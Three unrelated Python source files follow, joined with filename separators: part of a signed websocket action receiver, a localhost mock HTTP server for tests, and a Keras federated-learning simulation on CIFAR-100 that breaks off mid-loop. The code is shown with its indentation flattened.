def start_receiver(self):
if not CLOUD_ROUTING:
logging.info(
"outgoing messages only mode. Incoming event receiver not initialized"
)
return
if WEBSOCKET_RELAY_ADDRESS == "":
logging.warning("relay address empty. Not initializing relay")
return
websocket.enableTrace(RECEIVER_ENABLE_WEBSOCKET_TRACING)
receiver_thread = Thread(target=self.run_forever)
receiver_thread.start()
def __run_external_action_request(self, request: ActionRequestBody):
logging.info(f"got callback `{request.action_name}` {request.action_params}")
self.event_handler.run_external_action(
request.action_name,
request.action_params,
request.sinks,
)
def run_forever(self):
logging.info("starting relay receiver")
while self.active:
self.ws.run_forever()
logging.info("relay websocket closed")
time.sleep(INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC)
def stop(self):
logging.info(f"Stopping incoming receiver")
self.active = False
self.ws.close()
def __exec_external_request(
self, action_request: ExternalActionRequest, validate_timestamp: bool
):
if validate_timestamp and (
time.time() - action_request.body.timestamp
> INCOMING_REQUEST_TIME_WINDOW_SECONDS
):
logging.error(
f"Rejecting incoming request because it's too old. Cannot verify request {action_request}"
)
return
if not self.__validate_request(action_request.body, action_request.signature):
logging.error(f"Failed to validate action request {action_request}")
return
self.__run_external_action_request(action_request.body)
def on_message(self, ws, message):
# TODO: use typed pydantic classes here?
logging.debug(f"received incoming message {message}")
incoming_event = json.loads(message)
actions = incoming_event.get("actions", None)
if actions: # this is slack callback format
            # Slack callbacks have a list of 'actions'. Within each action there is
            # a 'value' field, which contains the actual action details we need to run.
            # This wrapper format is part of the Slack API, and cannot be changed by us.
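            # Roughly, the payload looks like (shape assumed for illustration):
            #   {"actions": [{"value": "<JSON-encoded ExternalActionRequest>"}]}
            # i.e. each action's "value" string is parsed below with
            # ExternalActionRequest.parse_raw().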
for action in actions:
try:
self.__exec_external_request(
ExternalActionRequest.parse_raw(action["value"]), False
)
except Exception:
logging.error(
f"Failed to run incoming event {incoming_event}", exc_info=True
)
else: # assume it's ActionRequest format
try:
self.__exec_external_request(
ExternalActionRequest(**incoming_event), True
)
except Exception:
logging.error(
f"Failed to run incoming event {incoming_event}", exc_info=True
)
def on_error(self, ws, error):
logging.info(f"Relay websocket error: {error}")
def on_open(self, ws):
account_id = self.event_handler.get_global_config().get("account_id")
cluster_name = self.event_handler.get_global_config().get("cluster_name")
open_payload = {
"action": "auth",
"account_id": account_id,
"cluster_name": cluster_name,
"version": RUNNER_VERSION,
}
logging.info(
f"connecting to server as account_id={account_id}; cluster_name={cluster_name}"
)
ws.send(json.dumps(open_payload))
def __validate_request(self, body: BaseModel, signature: str) -> bool:
signing_key = self.event_handler.get_global_config().get("signing_key")
if not signing_key:
logging.error(f"Signing key not available. Cannot verify request {body}")
return False
generated_signature = sign_action_request(body, signing_key)
return hmac.compare_digest(generated_signature, signature)
|
mock_server.py
|
# Copyright 2018 Cable Television Laboratories, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Standard library imports...
from BaseHTTPServer import BaseHTTPRequestHandler
import socket
import json
# Third-party imports...
import requests
from threading import Thread
from BaseHTTPServer import HTTPServer
class MockServerRequestHandler(BaseHTTPRequestHandler):
@classmethod
def setup_class(cls):
# Configure mock server.
cls.mock_server_port = get_free_port()
cls.mock_server = HTTPServer(('localhost', cls.mock_server_port),
MockServerRequestHandler)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
cls.mock_server_thread = Thread(target=cls.mock_server.serve_forever)
cls.mock_server_thread.setDaemon(True)
cls.mock_server_thread.start()
def do_GET(self):
# Process GET request, return a response with an HTTP 200
# status.
if self.headers.get('Authorization') is not None:
data = {'Token': '123'}
data = json.dumps(data).encode('utf-8')
self.send_response(requests.codes.ok)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(data)
return True
else:
self.send_response(requests.codes.ok)
self.end_headers()
return
def do_POST(self):
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
self.send_response(requests.codes.created)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(post_body)
return True
def do_PUT(self):
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
self.send_response(requests.codes.ok)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(post_body)
return True
def do_DELETE(self):
data = {'Deleted': '123'}
data = json.dumps(data).encode('utf-8')
self.send_response(requests.codes.ok)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(data)
return True
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
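# Illustrative usage from a test (the URL path and header value are arbitrary):
#
#   MockServerRequestHandler.setup_class()
#   url = 'http://localhost:{}/users'.format(
#       MockServerRequestHandler.mock_server_port)
#   response = requests.get(url, headers={'Authorization': 'Bearer abc'})
#   assert response.json() == {'Token': '123'}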
|
federated_learning_keras_consensus_FL_threads_CIFAR100_gradients_exchange.py
|
from DataSets import CIFARData
from DataSets_task import CIFARData_task
from consensus.consensus_v4 import CFA_process
from consensus.parameter_server_v2 import Parameter_Server
# use only for consensus , PS only for energy efficiency
# from ReplayMemory import ReplayMemory
import numpy as np
import os
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import models
import argparse
import warnings
import glob
import datetime
import scipy.io as sio
# import multiprocessing
import threading
import math
from matplotlib.pyplot import pause
import time
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser()
parser.add_argument('-resume', default=0, help="set 1 to resume from a previous simulation, 0 to start from the beginning", type=float)
parser.add_argument('-PS', default=0, help="set 1 to enable PS server and FedAvg, set 0 to disable PS", type=float)
parser.add_argument('-consensus', default=1, help="set 1 to enable consensus, set 0 to disable", type=float)
parser.add_argument('-mu', default=0.01, help="sets the learning rate for all setups", type=float)
parser.add_argument('-mu2', default=0.01, help="sets the gradient update rate", type=float)
parser.add_argument('-eps', default=0.5, help="sets the mixing parameters for model averaging (CFA)", type=float)
parser.add_argument('-eps_grads', default=0.5, help="sets the mixing parameters for gradient combining (CFA-GE)", type=float)
parser.add_argument('-target', default=0.1, help="sets the target loss to stop federation", type=float)
parser.add_argument('-K', default=30, help="sets the number of network devices", type=int)
parser.add_argument('-Ka', default=20, help="sets the number of active devices per round in FA (<= K)", type=int)
parser.add_argument('-N', default=1, help="sets the max. number of neighbors per device per round in CFA", type=int)
parser.add_argument('-Ka_consensus', default=30, help="sets the number of active devices for consensus", type=int)
parser.add_argument('-samp', default=500, help="sets the number samples per device", type=int)
parser.add_argument('-noniid_assignment', default=1, help=" set 0 for iid assignment, 1 for non-iid random", type=int)
parser.add_argument('-gradients', default=1, help=" set 0 to disable gradient exchange, 1 to enable", type=int)
parser.add_argument('-run', default=0, help=" set the run id", type=int)
parser.add_argument('-random_data_distribution', default=0, help=" set 0 for fixed distribution, 1 for time-varying", type=int)
parser.add_argument('-batches', default=5, help="sets the number of batches per learning round", type=int)
parser.add_argument('-batch_size', default=100, help="sets the batch size per learning round", type=int)
parser.add_argument('-graph', default=6, help="sets the input graph: 0 for default graph, >0 uses the input graph in vGraph.mat, and choose one graph from the available adjacency matrices", type=int)
parser.add_argument('-modelselection', default=0, help="sets the model: 0 for lenet-1", type=int)
args = parser.parse_args()
devices = args.K # NUMBER OF DEVICES
active_devices_per_round = args.Ka
max_epochs = 1000
validation_train = 50000 # VALIDATION and training DATASET size
validation_test = 10000
condition = args.modelselection
n_outputs = 100
optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0)
# optimizer = keras.optimizers.SGD(learning_rate=args.mu, momentum=0.9)
condition = args.modelselection
if args.consensus == 1:
federated = True
parameter_server = False
elif args.PS == 1:
federated = False
parameter_server = True
else: # CL: CENTRALIZED LEARNING ON DEVICE 0 (DATA CENTER)
federated = False
parameter_server = False
################# consensus, create the scheduling function ################
scheduling_tx = np.zeros((devices, max_epochs*2), dtype=int)
if parameter_server and not federated:
indexes_tx = np.zeros((args.Ka, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka, replace=False)
sr = devices - args.Ka + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:,k] = inds
elif not parameter_server and federated:
indexes_tx = np.zeros((args.Ka_consensus, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka_consensus, replace=False)
sr = devices - args.Ka_consensus + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka_consensus + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:, k] = inds
###########################################################################
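# A worked example of the schedule built above (with the parser defaults K=30,
# Ka=20): sr = 11, so epoch 0 activates devices 0-19, epoch 1 activates 1-20,
# ..., epoch 10 activates 10-29, and the window then wraps back to 0-19.
# The consensus (CFA) branch slides the same kind of window of Ka_consensus devices.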
if active_devices_per_round > devices:
active_devices_per_round = devices
target_loss = args.target
# Configuration parameters for the whole setup
seed = 42
# batch_size = 5 # Size of batch taken from replay buffer
batch_size = args.batch_size
number_of_batches = args.batches
training_set_per_device = args.samp # NUMBER OF TRAINING SAMPLES PER DEVICE
if (training_set_per_device > validation_train/args.K):
training_set_per_device = math.floor(validation_train/args.K)
print(training_set_per_device)
if batch_size > training_set_per_device:
batch_size = training_set_per_device
# if batch_size*number_of_batches > training_set_per_device:
# number_of_batches = math.floor(training_set_per_device/batch_size)
# number_of_batches = int(training_set_per_device/batch_size)
# number_of_batches = args.batches
number_of_batches_for_validation = int(validation_test/batch_size)
print("Number of batches for learning {}".format(number_of_batches))
max_lag = 1  # consensus max delay in epochs (e.g. 2 = neighbor models at most 2 epochs old)
refresh_server = 1 # refresh server updates (in sec)
validation_start = 1 # start validation in epochs
# Using huber loss for stability
loss_function = keras.losses.Huber()
# save scheduling format
# dict_0 = {"scheduling": scheduling_tx, "devices_scheduling": indexes_tx}
# sio.savemat("results/matlab/CFA_scheduling_devices_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}.mat".format(devices, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run), dict_0)
# def get_noniid_data(total_training_size, devices, batch_size):
# samples = np.random.random_integers(batch_size, total_training_size - batch_size * (devices - 1),
# devices) # create random numbers
# samples = samples / np.sum(samples, axis=0) * total_training_size # force them to sum to totals
# # Ignore the following if you don't need integers
# samples = np.round(samples) # transform them into integers
# remainings = total_training_size - np.sum(samples, axis=0) # check if there are corrections to be done
# step = 1 if remainings > 0 else -1
# while remainings != 0:
# i = np.random.randint(devices)
# if samples[i] + step >= 0:
# samples[i] += step
# remainings -= step
# return samples
# ####
def preprocess_observation(obs, batch_size):
    # cast to float and reshape into a batch of 32x32 RGB (CIFAR-style) images
    # (np.float was removed from NumPy; a plain float cast keeps the old behaviour)
    img = obs.astype(float)
    return img.reshape(batch_size, 32, 32, 3)
def create_q_model():
# Network defined by the Deepmind paper
inputs = layers.Input(shape=(32, 32, 3,))
if condition == 0:
# VGG 1 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Flatten()(layer3)
layer5 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer4)
classification = layers.Dense(n_outputs, activation="linear")(layer5)
elif condition == 1:
# VGG 2 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer3)
layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform', padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer4)
layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5)
layer7 = layers.Flatten()(layer6)
layer8 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer7)
classification = layers.Dense(n_outputs, activation="linear")(layer8)
else:
# VGG 3 BLOCK
layer1 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
inputs)
layer2 = layers.Conv2D(32, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer1)
layer3 = layers.MaxPooling2D(pool_size=(2, 2))(layer2)
layer4 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer3)
layer5 = layers.Conv2D(64, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer4)
layer6 = layers.MaxPooling2D(pool_size=(2, 2))(layer5)
layer7 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer6)
layer8 = layers.Conv2D(128, kernel_size=(3, 3), activation="relu", kernel_initializer='he_uniform',
padding='same', kernel_regularizer=tf.keras.regularizers.l2(0.01))(
layer7)
layer9 = layers.MaxPooling2D(pool_size=(2, 2))(layer8)
layer10 = layers.Flatten()(layer9)
layer11 = layers.Dense(128, activation="relu", kernel_initializer='he_uniform')(layer10)
classification = layers.Dense(n_outputs, activation="linear")(layer11)
# Convolutions
# layer1 = layers.Conv2D(32, 8, strides=4, activation="relu")(inputs)
# layer2 = layers.Conv2D(64, 4, strides=2, activation="relu")(layer1)
# layer3 = layers.Conv2D(64, 3, strides=1, activation="relu")(layer2)
#
# layer4 = layers.Flatten()(layer3)
#
# layer5 = layers.Dense(512, activation="relu")(layer4)
# classification = layers.Dense(n_outputs, activation="linear")(layer5)
return keras.Model(inputs=inputs, outputs=classification)
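# Note: create_q_model() returns, depending on `condition`, a 1-, 2- or 3-block
# VGG-style CNN for 32x32x3 inputs with `n_outputs` linear outputs; the training
# loops below select the output of the true class via a one-hot mask before
# applying the Huber loss.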
def processParameterServer(devices, active_devices_per_round, federated, refresh_server=1):
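    # Coordination is file based (as the code below shows): the server publishes the
    # aggregated weights and a global epoch counter as .npy files under results/, and
    # it keeps refreshing them until every device has dropped its final .mat result
    # file in the working directory.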
model_global = create_q_model()
model_parameters_initial = np.asarray(model_global.get_weights())
parameter_server = Parameter_Server(devices, model_parameters_initial, active_devices_per_round, indexes_tx)
global_target_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
epoch_count = 0
np.save(global_target_model, model_parameters_initial)
np.save(global_epoch, epoch_count)
pause(2) # wait for neighbors
while True:
pause(refresh_server) # refresh global model on every xx seconds
fileList = glob.glob('*.mat', recursive=False)
if len(fileList) == devices:
# stop the server
break
else:
np.save(global_target_model, parameter_server.federated_target_weights_aggregation(epoch_count, aggregation_type=0))
epoch_count += 1
np.save(global_epoch, epoch_count)
# execute for each deployed device
def processData(device_index, start_samples, samples, federated, full_data_size, number_of_batches, parameter_server, sample_distribution):
pause(5) # PS server (if any) starts first
checkpointpath1 = 'results/model{}.h5'.format(device_index)
outfile = 'results/dump_train_variables{}.npz'.format(device_index)
outfile_models = 'results/dump_train_model{}.npy'.format(device_index)
outfile_models_grad = 'results/dump_train_grad{}.npy'.format(device_index)
global_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
#np.random.seed(1)
#tf.random.set_seed(1) # common initialization
learning_rate = args.mu
learning_rate_local = learning_rate
B = np.ones((devices, devices)) - tf.one_hot(np.arange(devices), devices)
Probabilities = B[device_index, :]/(devices - 1)
training_signal = False
# check for backup variables on start
if os.path.isfile(checkpointpath1):
train_start = False
# backup the model and the model target
model = models.load_model(checkpointpath1)
model_transmitted = create_q_model()
data_history = []
label_history = []
local_model_parameters = np.load(outfile_models, allow_pickle=True)
model.set_weights(local_model_parameters.tolist())
dump_vars = np.load(outfile, allow_pickle=True)
frame_count = dump_vars['frame_count']
epoch_loss_history = dump_vars['epoch_loss_history'].tolist()
running_loss = np.mean(epoch_loss_history[-5:])
epoch_count = dump_vars['epoch_count']
else:
train_start = True
model = create_q_model()
model_transmitted = create_q_model()
data_history = []
label_history = []
frame_count = 0
# Experience replay buffers
epoch_loss_history = []
epoch_count = 0
running_loss = math.inf
if parameter_server:
epoch_global = 0
training_end = False
#a = model.get_weights()
# set an arbitrary optimizer, here Adam is used
#optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0)
#optimizer2 = keras.optimizers.SGD(learning_rate=args.mu2)
optimizer2 = keras.optimizers.Adam(learning_rate=args.mu2, clipnorm=1.0)
# create a data object (here radar data)
# start = time.time()
if args.noniid_assignment == 1:
data_handle = CIFARData_task(device_index, start_samples, samples, full_data_size, args.random_data_distribution)
else:
data_handle = CIFARData(device_index, start_samples, samples, full_data_size, args.random_data_distribution)
# end = time.time()
# time_count = (end - start)
    # print("Training time", time_count)
# create a consensus object
cfa_consensus = CFA_process(devices, device_index, args.N)
while True: # Run until solved
# collect 1 batch
frame_count += 1
obs, labels = data_handle.getTrainingData(batch_size)
data_batch = preprocess_observation(obs, batch_size)
# Save data and labels in the current learning session
data_history.append(data_batch)
label_history.append(labels)
if frame_count % number_of_batches == 0:
if not parameter_server:
epoch_count += 1
# check scheduling for federated
if federated:
if epoch_count == 1 or scheduling_tx[device_index, epoch_count] == 1:
training_signal = False
else:
# stop all computing, just save the previous model
training_signal = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# Local learning update every "number of batches" batches
# time_count = 0
if frame_count % number_of_batches == 0 and not training_signal:
# run local batches
for i in range(number_of_batches):
start = time.time()
data_sample = np.array(data_history[i])
label_sample = np.array(label_history[i])
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
with tf.GradientTape() as tape:
# Train the model on data samples
classes = model(data_sample)
# Apply the masks
class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# Calculate loss
loss = loss_function(label_sample, class_v)
# Backpropagation
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
#end = time.time()
#time_count = time_count + (end-start)/number_of_batches
del data_history
del label_history
data_history = []
label_history = []
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
cfa_consensus.update_local_model(model_weights)
grads_v = []
for d in range(len(grads)):
grads_v.append(grads[d].numpy())
grads_v = np.asarray(grads_v)
cfa_consensus.update_local_gradient(grads_v)
            # compute gradients for the neighbors selected in get_tx_connectivity; obtain a new test observation from the local database
obs_t, labels_t = data_handle.getTrainingData(batch_size)
data_batch_t = preprocess_observation(obs_t, batch_size)
masks_t = tf.one_hot(labels_t, n_outputs)
gradient_neighbor = cfa_consensus.get_tx_connectivity(device_index, args.N, devices)
outfile_n = 'results/dump_train_variables{}.npz'.format(gradient_neighbor)
outfile_models_n = 'results/dump_train_model{}.npy'.format(gradient_neighbor)
neighbor_model_for_gradient, success = cfa_consensus.get_neighbor_weights(epoch_count, outfile_n, outfile_models_n, epoch=0, max_lag=1)
if success:
model_transmitted.set_weights(neighbor_model_for_gradient.tolist())
else:
print("failed retrieving the model for gradient computation")
with tf.GradientTape() as tape2:
# Train the model on data samples
classes = model_transmitted(data_batch_t)
# Apply the masks
class_v = tf.reduce_sum(tf.multiply(classes, masks_t), axis=1)
# Calculate loss
loss = loss_function(labels_t, class_v)
# getting and save neighbor gradients
grads_t = tape2.gradient(loss, model_transmitted.trainable_variables)
grads_v = []
for d in range(len(grads_t)):
grads_v.append(grads_t[d].numpy())
grads_v = np.asarray(grads_v)
np.save(outfile_models_grad, grads_v)
np.random.seed(1)
tf.random.set_seed(1) # common initialization
if not train_start:
if federated and not training_signal:
eps_c = args.eps
# apply consensus for model parameter
neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor
#if args.gradients == 0 or running_loss < 0.5:
if args.gradients == 0:
                    # random selection of neighbor
# neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N, replace=False) # choose neighbor
# while neighbor == device_index:
# neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N,
# replace=False) # choose neighbor
print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index,
loss.numpy()))
model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, epoch_count, eps_c, max_lag))
if cfa_consensus.getTrainingStatusFromNeightbor():
training_signal = True # stop local learning, just do validation
else:
# compute gradients as usual
print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index,
loss.numpy()))
print("Applying gradient updates...")
# model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, epoch_count, eps_c, max_lag))
model_averaging = cfa_consensus.federated_weights_computing(neighbor, args.N, epoch_count, eps_c, max_lag)
model.set_weights(model_averaging)
if cfa_consensus.getTrainingStatusFromNeightbor():
# model.set_weights(model_averaging)
training_signal = True # stop local learning, just do validation
else:
grads = cfa_consensus.federated_grads_computing(neighbor, args.N, epoch_count, args.eps_grads, max_lag)
optimizer2.apply_gradients(zip(grads, model.trainable_variables))
else:
print("Warm up")
train_start = False
del model_weights
#start = time.time()
# validation tool for device 'device_index'
if epoch_count > validation_start and frame_count % number_of_batches == 0:
avg_cost = 0.
for i in range(number_of_batches_for_validation):
obs_valid, labels_valid = data_handle.getTestData(batch_size, i)
# obs_valid, labels_valid = data_handle.getRandomTestData(batch_size)
data_valid = preprocess_observation(np.squeeze(obs_valid), batch_size)
data_sample = np.array(data_valid)
label_sample = np.array(labels_valid)
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
classes = model(data_sample)
# Apply the masks
class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# Calculate loss
loss = loss_function(label_sample, class_v)
avg_cost += loss / number_of_batches_for_validation # Training loss
epoch_loss_history.append(avg_cost)
print("Device {} epoch count {}, validation loss {:.2f}".format(device_index, epoch_count,
avg_cost))
            # running loss: mean over the most recent validation epoch
running_loss = np.mean(epoch_loss_history[-1:])
#end = time.time()
#time_count = (end - start)
#print(time_count)
if running_loss < target_loss: # Condition to consider the task solved
print("Solved for device {} at epoch {} with average loss {:.2f} !".format(device_index, epoch_count, running_loss))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}_gradients{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run, args.random_data_distribution, args.gradients), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size, args.noniid_assignment,args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size), dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if epoch_count > max_epochs: # stop simulation
print("Unsolved for device {} at epoch {}!".format(device_index, epoch_count))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFA_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}_gradients{}.mat".format(
device_index, samples, devices, args.Ka_consensus, args.N, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution, args.gradients), dict_1)
sio.savemat(
"CFA_device_{}_samples_{}_devices_{}_neighbors_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, args.N, number_of_batches, batch_size), dict_1)
elif parameter_server:
sio.savemat(
"results/matlab/FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
sio.savemat(
"FA_device_{}_samples_{}_devices_{}_active_{}_batches_{}_size{}.mat".format(
device_index, samples, devices, active_devices_per_round, number_of_batches, batch_size),
dict_1)
else: # CL
sio.savemat(
"results/matlab/CL_samples_{}_devices_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
samples, devices, number_of_batches, batch_size,
args.noniid_assignment, args.run, args.random_data_distribution), dict_1)
break
if __name__ == "__main__":
if args.resume == 0: # clear all files
# DELETE TEMPORARY CACHE FILES
        for pattern in ('results/*.npy', 'results/*.h5', 'results/*.npz', '*.mat'):
            fileList = glob.glob(pattern, recursive=False)
            print(fileList)
            for filePath in fileList:
                try:
                    os.remove(filePath)
                except OSError:
                    print("Error while deleting file")
# main loop for multiprocessing
t = []
############# enable consensus based federation #######################
# federated = False
# federated = True
########################################################
##################### enable parameter server ##############
# parameter_server = False
server_index = devices
# parameter_server = True
#########################################################
samples = np.zeros(devices) # training samples per device
for id in range(devices):
# samples[id]=math.floor(w[id]*validation_train)
# samples[id] = math.floor(balancing_vect[id]*fraction_training)
samples[id] = training_set_per_device
# samples = int(fraction_training/devices) # training samples per device
# ######################### Create a non-iid assignment ##########################
# if args.noniid_assignment == 1:
# total_training_size = training_set_per_device * devices
# samples = get_noniid_data(total_training_size, devices, batch_size)
# while np.min(samples) < batch_size:
# samples = get_noniid_data(total_training_size, devices, batch_size)
#############################################################################
print(samples)
#################################### code testing CL learning (0: data center)
# federated = False
# parameter_server = False
# processData(0, validation_train, federated, validation_train, number_of_batches, parameter_server)
######################################################################################
np.random.seed(1)
tf.random.set_seed(1) # common initialization
if federated or parameter_server:
for ii in range(devices):
# position start
if ii == 0:
start_index = 0
else:
start_index = start_index + int(samples[ii-1])
